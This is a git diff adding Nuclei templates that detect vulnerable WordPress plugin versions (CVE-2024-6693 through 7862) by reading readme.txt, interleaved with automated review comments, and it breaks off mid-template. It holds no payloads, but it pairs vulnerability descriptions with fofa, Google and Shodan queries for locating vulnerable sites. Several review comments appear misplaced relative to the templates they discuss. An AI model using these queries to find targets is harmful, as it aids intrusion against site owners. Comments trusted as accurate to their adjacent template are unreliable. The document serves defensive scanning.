GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wccp-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wccp-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 15.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6693.yaml b/nuclei-templates/CVE-2024/CVE-2024-6693.yaml new file mode 100644 index 0000000000..88f2e91f01 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6693.yaml 
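Review bot: An open redirect is one of the few issues in this batch that could be verified non-destructively with a single request if the redirect parameter named in the Wordfence advisory were used, whereas this template only fingerprints `Stable tag` in readme.txt; if the parameter is not public, the description should at least note that the check is version-based. `classification` lacks `cwe-id: CWE-601`. WP Content Copy Protection PRO is a paid plugin, so whether `readme.txt` is even shipped and web-readable in its distribution is worth confirming before relying on this path.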
@@ -0,0 +1,59 @@ +id: CVE-2024-6693 + +info: + name: > + WP Content Copy Protection & No Right Click (PRO) <= 15.0 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP Content Copy Protection & No Right Click (PRO) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 15.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d2f30e7-75f2-40c2-a421-aec13d436efc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6693 + metadata: + fofa-query: "wp-content/plugins/wccp-pro/" + google-query: inurl:"/wp-content/plugins/wccp-pro/" + shodan-query: 'vuln:CVE-2024-6693' + tags: cve,wordpress,wp-plugin,wccp-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wccp-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wccp-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 15.0') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-6804.yaml b/nuclei-templates/CVE-2024/CVE-2024-6804.yaml new file mode 100644 index 0000000000..93a2c069c1 
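Review bot: `severity: low` does not match `cvss-score: 4.4`, which is Medium on the CVSS v3.1 scale (4.0–6.9); set `severity: medium` and the trailing `medium` tag. The description lists real preconditions — admin-level attacker, multisite or `unfiltered_html` disabled — that a readme.txt version check cannot evaluate, so on most single-site installs this template will report a finding that is not exploitable; a `# version-based detection only; preconditions in description are not checked` comment above `http:` would help triage. `cwe-id: CWE-79` is also missing from `classification`.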
--- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-6804.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6804 + +info: + name: > + Jeg Elementor Kit <= 2.6.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File + author: topscoder + severity: low + description: > + The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5491ff65-9060-4b0b-a31d-7b95ea581310?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6804 + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:CVE-2024-6804' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7304.yaml b/nuclei-templates/CVE-2024/CVE-2024-7304.yaml new file mode 100644 index 0000000000..9bdb527719 --- /dev/null 
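Review bot: `severity: low` is inconsistent with the declared `cvss-score: 6.4` (`AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N`), which is Medium under CVSS v3.1; change to `severity: medium` and `tags: cve,wordpress,wp-plugin,jeg-elementor-kit,medium` so severity filtering does not bury it. `cwe-id: CWE-79` should be added under `classification`. As with the other generated templates here, the match is a readme.txt `Stable tag` fingerprint and does not attempt the SVG upload, which is fine for a scanner but should be stated in the description.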
+++ b/nuclei-templates/CVE-2024/CVE-2024-7304.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7304 + +info: + name: > + Ninja Tables – Easiest Data Table Builder <= 5.0.12 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Ninja Tables – Easiest Data Table Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 5.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b1eb6896-2de3-4d4d-9b5f-253aaffd193b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7304 + metadata: + fofa-query: "wp-content/plugins/ninja-tables/" + google-query: inurl:"/wp-content/plugins/ninja-tables/" + shodan-query: 'vuln:CVE-2024-7304' + tags: cve,wordpress,wp-plugin,ninja-tables,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ninja-tables/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ninja-tables" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0.12') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7687.yaml b/nuclei-templates/CVE-2024/CVE-2024-7687.yaml new file mode 100644 index 0000000000..55bd99bc9a --- /dev/null 
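Review bot: `cvss-score: 6.4` with `severity: low` is a mismatch — 6.4 is Medium on the CVSS v3.1 qualitative scale — so `severity: medium` and a `medium` tag are the consistent values. `cwe-id: CWE-79` is missing. Ninja Tables is widely installed, so this readme.txt check will fire often; the author-level SVG upload is never attempted, and the description should say the detection is version-based so a hit is not read as a confirmed injection.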
+++ b/nuclei-templates/CVE-2024/CVE-2024-7687.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7687 + +info: + name: > + AZIndex <= 0.8.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The AZIndex plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update plugin settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b96d79b-cd9c-4925-9c15-d0aaf3c0556a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7687 + metadata: + fofa-query: "wp-content/plugins/azindex/" + google-query: inurl:"/wp-content/plugins/azindex/" + shodan-query: 'vuln:CVE-2024-7687' + tags: cve,wordpress,wp-plugin,azindex,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/azindex/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "azindex" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7688.yaml b/nuclei-templates/CVE-2024/CVE-2024-7688.yaml new file mode 100644 index 0000000000..87ff3c5227 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7688.yaml 
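Review bot: No `cwe-id` is set although the description names missing nonce validation; add `cwe-id: CWE-352`. AZIndex is an old plugin whose readme may well carry `Stable tag: trunk`, in which case the `([0-9.]+)` capture is empty and the `and`-joined `compare_versions` matcher fails silently — if you want a signal in that case, a second pattern such as `- "(?mi)^= ([0-9.]+) =$"` against the changelog heading is a common fallback, but confirm that `compare_versions` receives the first captured value. The two `version` extractors are byte-identical apart from `internal: true`.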
@@ -0,0 +1,59 @@ +id: CVE-2024-7688 + +info: + name: > + AZIndex <= 0.8.1 - Cross-Site Request Forgery to Index Deletion + author: topscoder + severity: medium + description: > + The AZIndex plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.8.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete indexes via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9731e3a-4972-4e1e-b6cd-4bc00a6e9552?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7688 + metadata: + fofa-query: "wp-content/plugins/azindex/" + google-query: inurl:"/wp-content/plugins/azindex/" + shodan-query: 'vuln:CVE-2024-7688' + tags: cve,wordpress,wp-plugin,azindex,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/azindex/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "azindex" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-7791.yaml b/nuclei-templates/CVE-2024/CVE-2024-7791.yaml new file mode 100644 index 0000000000..8597291466 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7791.yaml 
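Review bot: This template is identical in logic to CVE-2024-7687 in the same commit (same readme.txt path, same `<= 0.8.1` bound); only the metadata differs, so every host that matches one matches both — acceptable, but the description should say the detection is version-based rather than implying index deletion was confirmed. `cwe-id: CWE-352` is missing from `classification`. The CVSS vector `S:U/C:N/I:L` at 4.3 is consistent with `severity: medium`, unlike several siblings in this commit, so no change is needed there.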
@@ -0,0 +1,59 @@ +id: CVE-2024-7791 + +info: + name: > + 140+ Widgets | Xpro Addons For Elementor – FREE <= 1.4.4.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Post Grid Widget + author: topscoder + severity: low + description: > + The 140+ Widgets | Xpro Addons For Elementor – FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘arrow’ parameter within the Post Grid widget in all versions up to, and including, 1.4.4.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6025dd5-a1d7-48cc-90b3-f020d3d2298b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-7791 + metadata: + fofa-query: "wp-content/plugins/xpro-elementor-addons/" + google-query: inurl:"/wp-content/plugins/xpro-elementor-addons/" + shodan-query: 'vuln:CVE-2024-7791' + tags: cve,wordpress,wp-plugin,xpro-elementor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/xpro-elementor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "xpro-elementor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4.3') \ No newline at end of file 
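Review bot: `severity: low` conflicts with `cvss-score: 6.4`, which is Medium (4.0–6.9) on the CVSS v3.1 scale the vector uses; set `severity: medium` and replace the `low` tag with `medium`. Add `cwe-id: CWE-79` under `classification`. The `name` and `description` reproduce typographic quotes in `‘arrow’` and an en dash in `Xpro Addons For Elementor – FREE`; that is valid YAML, but anyone grepping for `'arrow'` will miss it, so normalising to ASCII is worth considering if the repo's other templates do so.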
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7816.yaml b/nuclei-templates/CVE-2024/CVE-2024-7816.yaml new file mode 100644 index 0000000000..82cbd5f92e --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7816.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7816 + +info: + name: > + Gixaw Chat <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Gixaw Chat plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ecaa02bf-62be-4f1d-af31-96afc72a830d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7816 + metadata: + fofa-query: "wp-content/plugins/gixaw-chat/" + google-query: inurl:"/wp-content/plugins/gixaw-chat/" + shodan-query: 'vuln:CVE-2024-7816' + tags: cve,wordpress,wp-plugin,gixaw-chat,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/gixaw-chat/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "gixaw-chat" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file 
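Review bot: `classification` has no `cwe-id`; the described flaw is missing nonce validation, so add `cwe-id: CWE-352`. The readme-based version fingerprint is the whole check — nothing exercises the forged request — and that should be stated in the description for anyone triaging a hit. `shodan-query: 'vuln:CVE-2024-7816'` is circular; an `http.html:"/wp-content/plugins/gixaw-chat/"` query is the one that actually finds installs.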
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7817.yaml b/nuclei-templates/CVE-2024/CVE-2024-7817.yaml new file mode 100644 index 0000000000..dbf260b31a --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7817.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7817 + +info: + name: > + Misiek Photo Album <= 1.4.3 - Cross-Site Request Forgery to Album Deletion + author: topscoder + severity: medium + description: > + The Misiek Photo Album plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to delete albums via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9e6eec31-0603-40ab-9ed1-eedb163de1d6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7817 + metadata: + fofa-query: "wp-content/plugins/misiek-photo-album/" + google-query: inurl:"/wp-content/plugins/misiek-photo-album/" + shodan-query: 'vuln:CVE-2024-7817' + tags: cve,wordpress,wp-plugin,misiek-photo-album,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/misiek-photo-album/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "misiek-photo-album" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.3') \ No newline at end of file 
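Review bot: Missing `cwe-id: CWE-352` under `classification` for what the description calls missing nonce validation. The check fingerprints `Stable tag` in readme.txt and cannot distinguish a site that runs ≤ 1.4.3 from one where the plugin is installed but deactivated — readme.txt is served either way — so the description should carry a version-based-detection caveat. Not attempting the destructive album deletion is the right call for a scanner template, and saying so explicitly would stop someone "improving" it later.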
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7818.yaml b/nuclei-templates/CVE-2024/CVE-2024-7818.yaml new file mode 100644 index 0000000000..2237e83b48 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7818.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7818 + +info: + name: > + Misiek Photo Album <= 1.4.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Misiek Photo Album plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a25a00b5-baf3-4175-b242-857c1f79b9a2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-7818 + metadata: + fofa-query: "wp-content/plugins/misiek-photo-album/" + google-query: inurl:"/wp-content/plugins/misiek-photo-album/" + shodan-query: 'vuln:CVE-2024-7818' + tags: cve,wordpress,wp-plugin,misiek-photo-album,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/misiek-photo-album/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "misiek-photo-album" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.3') \ No newline at end of file 
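Review bot: The CVSS vector here is `S:U/C:L/I:L` at 5.4 while the other CSRF-to-stored-XSS templates in this commit (CVE-2024-6017, 7687, 7816, 7822, 7860) use `S:C` at 6.1 for what reads as the same class of issue; if that is what Wordfence assigned, fine, but it is worth a glance at the reference before merging. `cwe-id: CWE-352` is missing. As with the sibling Misiek template, detection is the readme.txt `Stable tag` only, so an explicit note in the description that exploitability is not confirmed would help.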
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7820.yaml b/nuclei-templates/CVE-2024/CVE-2024-7820.yaml new file mode 100644 index 0000000000..761d29bd41 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7820.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7820 + +info: + name: > + ILC Thickbox <= 1.0 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The ILC Thickbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e700a02f-21a7-4786-b7a7-d0c83a9314e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7820 + metadata: + fofa-query: "wp-content/plugins/ilc-thickbox/" + google-query: inurl:"/wp-content/plugins/ilc-thickbox/" + shodan-query: 'vuln:CVE-2024-7820' + tags: cve,wordpress,wp-plugin,ilc-thickbox,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ilc-thickbox/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ilc-thickbox" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file 
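Review bot: Add `cwe-id: CWE-352`; the description attributes the issue to missing nonce validation but `classification` leaves the weakness unset. ILC Thickbox ≤ 1.0 is a very small plugin whose readme could declare `Stable tag: trunk`, in which case the `([0-9.]+)` capture yields nothing and the template is silent — acceptable fail-closed behaviour, but a one-line comment on the regex saying so avoids someone later "fixing" it into a false positive. The exported and internal `version` extractors duplicate each other.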
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7822.yaml b/nuclei-templates/CVE-2024/CVE-2024-7822.yaml new file mode 100644 index 0000000000..7907ac1772 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7822.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7822 + +info: + name: > + Quick Code <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Quick Code plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c287ed1d-83ff-4ee7-bebc-e57850d081a0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7822 + metadata: + fofa-query: "wp-content/plugins/quick-code/" + google-query: inurl:"/wp-content/plugins/quick-code/" + shodan-query: 'vuln:CVE-2024-7822' + tags: cve,wordpress,wp-plugin,quick-code,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/quick-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "quick-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7860.yaml b/nuclei-templates/CVE-2024/CVE-2024-7860.yaml new file mode 100644 index 0000000000..a890260d92 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7860.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7860 + +info: + name: > + Simple Headline Rotator <= 1.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Simple Headline Rotator plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/beaea592-5eb5-4400-a4a8-b73f9b94198b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7860 + metadata: + fofa-query: "wp-content/plugins/simple-headline-rotator/" + google-query: inurl:"/wp-content/plugins/simple-headline-rotator/" + shodan-query: 'vuln:CVE-2024-7860' + tags: cve,wordpress,wp-plugin,simple-headline-rotator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-headline-rotator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-headline-rotator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7861.yaml b/nuclei-templates/CVE-2024/CVE-2024-7861.yaml new file mode 100644 index 0000000000..6955b61b4b --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7861.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7861 + +info: + name: > + Misiek Paypal <= 1.1.20090324 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Misiek Paypal plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.20090324. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/cefdf1c5-eab4-4f06-aa5c-24cdef36e5f9?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7861 + metadata: + fofa-query: "wp-content/plugins/misiek-paypal/" + google-query: inurl:"/wp-content/plugins/misiek-paypal/" + shodan-query: 'vuln:CVE-2024-7861' + tags: cve,wordpress,wp-plugin,misiek-paypal,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/misiek-paypal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "misiek-paypal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.20090324') \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2024/CVE-2024-7862.yaml b/nuclei-templates/CVE-2024/CVE-2024-7862.yaml new file mode 100644 index 0000000000..9e55ee0e0f --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-7862.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7862 + +info: + name: > + Blog Introduction <= 0.3.0 - Cross-Site Request Forgery to Settings Update + author: topscoder + severity: medium + description: > + The Blog Introduction plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3.0. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2896c925-e035-4193-92db-e8a3dd34a0b7?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-7862 + metadata: + fofa-query: "wp-content/plugins/blogintroduction-wordpress-plugin/" + google-query: inurl:"/wp-content/plugins/blogintroduction-wordpress-plugin/" + shodan-query: 'vuln:CVE-2024-7862' + tags: 